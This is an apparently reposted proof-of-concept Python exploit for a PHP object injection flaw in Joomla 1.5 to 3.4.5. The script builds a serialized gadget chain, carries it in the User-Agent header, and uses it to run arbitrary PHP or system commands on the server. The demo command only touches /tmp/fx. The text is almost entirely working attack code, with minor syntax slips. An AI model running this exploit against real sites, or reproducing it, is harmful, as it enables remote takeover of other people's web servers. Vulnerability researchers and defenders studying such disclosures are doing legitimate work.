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Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution
来源:http://www.sec-1.com/ 作者:Sec-1 发布时间:2015-12-16  
   Simple PoC for Joomla Object Injection.
   Gary @ Sec-1 ltd
import requests #  easy_install requests
def get_url(url, user_agent):
    headers = {
    'User-Agent': user_agent
    cookies = requests.get(url,headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers,cookies=cookies)   
    return response
def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
    return encoded[:-1]
def generate_payload(php_payload):
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
    terminate = '\xf0\xfd\xfd\xfd';
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)   
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
    return exploit_template
pl = generate_payload("system('touch /tmp/fx');")
print get_url("", pl)
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